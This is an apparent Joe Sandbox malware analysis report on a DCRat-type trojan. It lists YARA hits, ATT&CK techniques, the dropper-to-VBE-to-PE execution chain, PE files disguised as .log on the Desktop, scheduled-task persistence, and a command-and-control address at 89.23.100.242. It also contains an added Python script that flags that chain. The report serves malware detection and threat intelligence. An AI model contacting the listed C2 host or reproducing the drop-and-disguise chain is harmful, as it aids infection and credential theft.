Source: Yara match | File source: 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match | File source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED
Source: Yara match | File source: hz7DzW2Yop.exe, type: SAMPLE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match | File source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED
MITRE ATT&CK Matrix (the number in front of a technique is the count of behavior signatures that matched it; techniques without a number did not match)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 167 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | Login Hook | Login Hook | 1 Software Packing | NTDS | 371 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 132 Masquerading | Cached Domain Credentials | 261 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 261 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
Behavior Graph ID: 1587336 Sample: hz7DzW2Yop.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 11 other signatures

Process tree (graph node numbers in parentheses; "dropped", "network" and "signatures" lines belong to the process directly above them):

hz7DzW2Yop.exe (10), started
    dropped: C:\...\serverBrokerperfMonitor.exe (PE32); C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe (data)
    signatures: Found many strings related to Crypto-Wallets (likely being stolen)
    wscript.exe (21), started
        signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
        cmd.exe (24), started
            serverBrokerperfMonitor.exe (26), started
                dropped: C:\Windows\ShellExperiences\uAsLgsGzSk.exe (PE32); C:\Users\user\Desktop\zIxCDFUn.log (PE32); C:\Users\user\Desktop\zHJVyCcw.log (PE32); 13 other malicious files
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
                cmd.exe (32), started
                    signatures: Drops executables to the windows directory (C:\Windows) and starts them
                    uAsLgsGzSk.exe (41), started
                        network: 89.23.100.242, ports 49736, 49737, 49738 (MAXITEL-ASRU, Russian Federation)
                        dropped: C:\Users\user\Desktop\xRAMIbuT.log (PE32); C:\Users\user\Desktop\vPOensqX.log (PE32); C:\Users\user\Desktop\qTMMgMAe.log (PE32); 8 other malicious files
                        signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); 2 other signatures
                    conhost.exe (46), started
                    2 other processes (60)
                powershell.exe (35), started
                    signatures: Loading BitLocker PowerShell Module
                    conhost.exe (48), started
                    WmiPrvSE.exe (50), started
                powershell.exe (37), started
                    conhost.exe (52), started
                3 other processes (39)
                    conhost.exe (54), started
                    conhost.exe (56), started
                    conhost.exe (58), started
            conhost.exe (30), started
uAsLgsGzSk.exe (14), started
    signatures: Multi AV Scanner detection for dropped file
svchost.exe (16), started
    network: 127.0.0.1 (unknown)
uAsLgsGzSk.exe (19), started
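The behavior graph reads as one chain: the sample writes a .vbe and a PE into C:\HyperWebbroker, wscript.exe runs the script, which goes through cmd.exe to start the PE, which in turn drops a PE under C:\Windows\ShellExperiences plus PE files disguised as .log on the Desktop, starts the C:\Windows copy through another cmd.exe, and that copy is the one that talks to 89.23.100.242. The script below is an added example, not code from the Joe Sandbox report or from the malware: it models the graph as a process tree (graph node numbers stand in for PIDs; edges the graph abbreviates as "N other processes" are left out) and runs four ancestry-based rules over it. The rules themselves are this example's assumptions about what a detection engineer would alert on.

```python
"""Flag the execution chain shown in the report's behavior graph.

Added example; not code from the Joe Sandbox report. TREE is transcribed from
the graph above (node numbers used as PIDs; "N other processes" edges omitted).
The four rules are this example's own assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Iterator


@dataclass
class Proc:
    node: int
    parent: int | None
    image: str                                        # full path where the graph gives one
    drops: list[tuple[str, str]] = field(default_factory=list)   # (path, file type)
    remote_ips: list[str] = field(default_factory=list)


# Transcribed from the behavior graph (constructed data model, see docstring).
TREE = [
    Proc(10, None, "hz7DzW2Yop.exe",
         drops=[(r"C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe", "data"),
                (r"C:\HyperWebbroker\serverBrokerperfMonitor.exe", "PE32")]),
    Proc(21, 10, "wscript.exe"),
    Proc(24, 21, "cmd.exe"),
    Proc(26, 24, r"C:\HyperWebbroker\serverBrokerperfMonitor.exe",
         drops=[(r"C:\Windows\ShellExperiences\uAsLgsGzSk.exe", "PE32"),
                (r"C:\Users\user\Desktop\zIxCDFUn.log", "PE32"),
                (r"C:\Users\user\Desktop\zHJVyCcw.log", "PE32")]),
    Proc(30, 24, "conhost.exe"),
    Proc(32, 26, "cmd.exe"),
    Proc(35, 26, "powershell.exe"),
    Proc(37, 26, "powershell.exe"),
    Proc(41, 32, r"C:\Windows\ShellExperiences\uAsLgsGzSk.exe",
         drops=[(r"C:\Users\user\Desktop\xRAMIbuT.log", "PE32")],
         remote_ips=["89.23.100.242"]),
    Proc(50, 35, "WmiPrvSE.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe"}
NOISE = {"conhost.exe"}                      # console host, always a child of cmd.exe
EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".sys")


def image_name(p: Proc) -> str:
    return p.image.rsplit("\\", 1)[-1].lower()


def ancestors(by_node: dict[int, Proc], p: Proc) -> Iterator[Proc]:
    """Yield parent, grandparent, ... up to the root."""
    while p.parent is not None:
        p = by_node[p.parent]
        yield p


def detect(tree: list[Proc]) -> list[tuple[str, int]]:
    """Return (rule, node) findings for every process in the tree."""
    by_node = {p.node: p for p in tree}
    dropped_paths = {path.lower() for p in tree for path, _ in p.drops}
    findings: list[tuple[str, int]] = []
    for p in tree:
        anc = list(ancestors(by_node, p))
        under_script_host = any(image_name(a) in SCRIPT_HOSTS for a in anc)
        me = image_name(p)
        # R1: script host -> shell -> something that is not itself a shell/host: the
        #     wscript.exe -> cmd.exe -> serverBrokerperfMonitor.exe step in the graph.
        if (under_script_host and p.parent is not None
                and image_name(by_node[p.parent]) in SHELLS
                and me not in SCRIPT_HOSTS | SHELLS | NOISE):
            findings.append(("script_host_chain", p.node))
        # R2: the image being run lives under C:\Windows and was written by a
        #     process in this same tree ("drops executables to C:\Windows and starts them").
        img = p.image.lower()
        if img.startswith("c:\\windows\\") and img in dropped_paths:
            findings.append(("runs_dropped_windows_dir_exe", p.node))
        # R3: a PE written with a non-executable extension (the Desktop .log files).
        if any(ftype.startswith("PE") and not path.lower().endswith(EXEC_EXT)
               for path, ftype in p.drops):
            findings.append(("pe_with_decoy_extension", p.node))
        # R4: network egress from a process descended from a script host.
        if p.remote_ips and under_script_host:
            findings.append(("egress_from_script_chain", p.node))
    return findings


if __name__ == "__main__":
    names = {p.node: image_name(p) for p in TREE}
    for rule, node in detect(TREE):
        print(f"{rule:<32} node {node:<3} {names[node]}")
```

R2 is the rule worth keeping in a real pipeline: it needs the file-write event and the process-start event to be joined on path within the same tree, which is exactly the correlation a per-event signature cannot do, and it is what separates this sample's C:\Windows\ShellExperiences drop from a legitimate installer.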



Source | Detection | Scanner | Label
hz7DzW2Yop.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
hz7DzW2Yop.exe | 60% | Virustotal |
hz7DzW2Yop.exe | 100% | Avira | VBS/Runner.VPG
hz7DzW2Yop.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Recovery\SystemSettings.exe | 100% | Avira | HEUR/AGEN.1323342
C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\Desktop\cIDyHnkk.log | 100% | Avira | TR/Agent.jbwuj
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | 100% | Avira | HEUR/AGEN.1323342
C:\HyperWebbroker\serverBrokerperfMonitor.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\FyhuXVvF.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\Desktop\hnxxzxgb.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Users\user\Desktop\LqKTzAAu.log | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | 100% | Joe Sandbox ML |
C:\Recovery\SystemSettings.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\IitSDvGY.log | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | 100% | Joe Sandbox ML |
C:\HyperWebbroker\serverBrokerperfMonitor.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\NVLRgsWM.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\HupKRiKa.log | 100% | Joe Sandbox ML |
C:\HyperWebbroker\serverBrokerperfMonitor.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\SystemSettings.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\uAsLgsGzSk.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CvvLBlqK.log | 25% | ReversingLabs |
C:\Users\user\Desktop\FyhuXVvF.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GvICsVKA.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\HupKRiKa.log | 5% | ReversingLabs |
C:\Users\user\Desktop\IitSDvGY.log | 16% | ReversingLabs |
C:\Users\user\Desktop\JwbtnRPV.log | 8% | ReversingLabs |
C:\Users\user\Desktop\LqKTzAAu.log | 5% | ReversingLabs |
C:\Users\user\Desktop\NVLRgsWM.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\QdcRcxPi.log | 8% | ReversingLabs |
C:\Users\user\Desktop\cIDyHnkk.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\eIxzTFKJ.log | 25% | ReversingLabs |
C:\Users\user\Desktop\hnxxzxgb.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\htcPaTVC.log | 16% | ReversingLabs |
C:\Users\user\Desktop\maPwcuvP.log | 25% | ReversingLabs |
C:\Users\user\Desktop\mlFoDzaq.log | 9% | ReversingLabs |
C:\Users\user\Desktop\qTMMgMAe.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\qeoNTMEG.log | 17% | ReversingLabs |
C:\Users\user\Desktop\vJjMMWBx.log | 9% | ReversingLabs |
C:\Users\user\Desktop\vPOensqX.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\xRAMIbuT.log | 17% | ReversingLabs |
C:\Users\user\Desktop\zHJVyCcw.log | 25% | ReversingLabs |
C:\Users\user\Desktop\zIxCDFUn.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Windows\ShellExperiences\uAsLgsGzSk.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
Source | Detection | Scanner | Label
https://go.microP | 0% | Avira URL Cloud | safe
http://www.t.com/pk | 0% | Avira URL Cloud | safe
http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php | 0% | Avira URL Cloud | safe
https://go.microPackageManagementp | 0% | Avira URL Cloud | safe
http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi | 0% | Avira URL Cloud | safe
http://89.23.100.242 | 0% | Avira URL Cloud | safe
                                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://go.microP | powershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.t.com/pk | powershell.exe, 0000001A.00000002.2818911280.0000020171DE3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 0000001A.00000002.2801807600.0000020171A60000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mic | powershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi | uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefox | uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://89.23.100.242 | uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 0000001A.00000002.2818911280.0000020171E4C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://go.microPackageManagementp | powershell.exe, 0000001C.00000002.2903142161.000001FE9F3F4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000015.00000002.2057907934.000001C09B6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87479000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000015.00000002.2768943723.000001C0AB4F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2748189605.000002586F235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2708101796.0000014FB13A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2554456806.0000020110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2710524379.000001FE972C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micft.cMicRosof | powershell.exe, 00000016.00000002.2966338477.00000258775C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.000000000374E000.00000004.00000800.00020000.00000000.sdmp, serverBrokerperfMonitor.exe, 00000005.00000002.1900253467.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2057907934.000001C09B481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2061740190.000002585F1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2053081962.0000014FA1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2021592842.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2040152046.000001FE87251000.00000004.00000800.00020000.00000000.sdmp, uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
89.23.100.242 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | true
                                                                            IP
                                                                            127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587336
Start date and time: 2025-01-10 07:56:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hz7DzW2Yop.exe (renamed because original name is a hash value)
Original Sample Name: 46dcddd43cbaeae845c14e7306726ff2.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@37/346@0/2
EGA Information:
• Successful, ratio: 50%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SystemSettings.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
• Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.109.210.53, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7996 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8004 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8020 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8068 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:57:22 | API Interceptor | 151x Sleep call for process: powershell.exe modified
01:57:30 | API Interceptor | 777931x Sleep call for process: uAsLgsGzSk.exe modified
01:57:31 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:57:21 | Task Scheduler | Run new task: SystemSettings path: "C:\Recovery\SystemSettings.exe"
06:57:21 | Task Scheduler | Run new task: SystemSettingsS path: "C:\Recovery\SystemSettings.exe"
06:57:21 | Task Scheduler | Run new task: uAsLgsGzSk path: "C:\Recovery\uAsLgsGzSk.exe"
06:57:21 | Task Scheduler | Run new task: uAsLgsGzSku path: "C:\Recovery\uAsLgsGzSk.exe"
                                                                            No context
                                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MAXITEL-ASRU | Fixer.exe | malicious | RedLine, SheetRat | 89.23.97.121
MAXITEL-ASRU | Fixer.exe | malicious | RedLine | 89.23.97.121
MAXITEL-ASRU | T4qO1i2Jav.exe | malicious | LummaC Stealer | 89.23.100.42
MAXITEL-ASRU | XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.180
MAXITEL-ASRU | 9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT | 89.23.96.180
MAXITEL-ASRU | bPkG0wTVon.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | itLDZwgFNE.exe | malicious | Flesh Stealer | 89.23.100.233
MAXITEL-ASRU | 3gJQoqWpxb.bat | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 89.23.100.42
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 89.23.100.42
                                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\CvvLBlqK.log | 7aHY4r6vXR.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | 0V2JsCrGUB.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | FYKrlfQrxb.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | PlZA6b48MW.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | 3XtEci4Mmo.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | wxl1r0lntg.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | HaLCYOFjMN.exe | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | Z90Z9bYzPa.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | 0J5DzstGPi.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\CvvLBlqK.log | 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | malicious | DCRat, PureLog Stealer, zgRAT
Process: C:\Users\user\Desktop\hz7DzW2Yop.exe
File Type: data
Category: dropped
Size (bytes): 245
Entropy (8bit): 5.884797037981624
Encrypted: false
SSDEEP: 6:GJ2wqK+NkLzWbHOurFnBaORbM5nCJO+/s1m8+Hs:GJ7MCzWLOuhBaORbQCJH0oXM
MD5: DEE780F62EACDC597601C402B88EA968
SHA1: 9A4196726254BCCBDFF34B276F613515838817C2
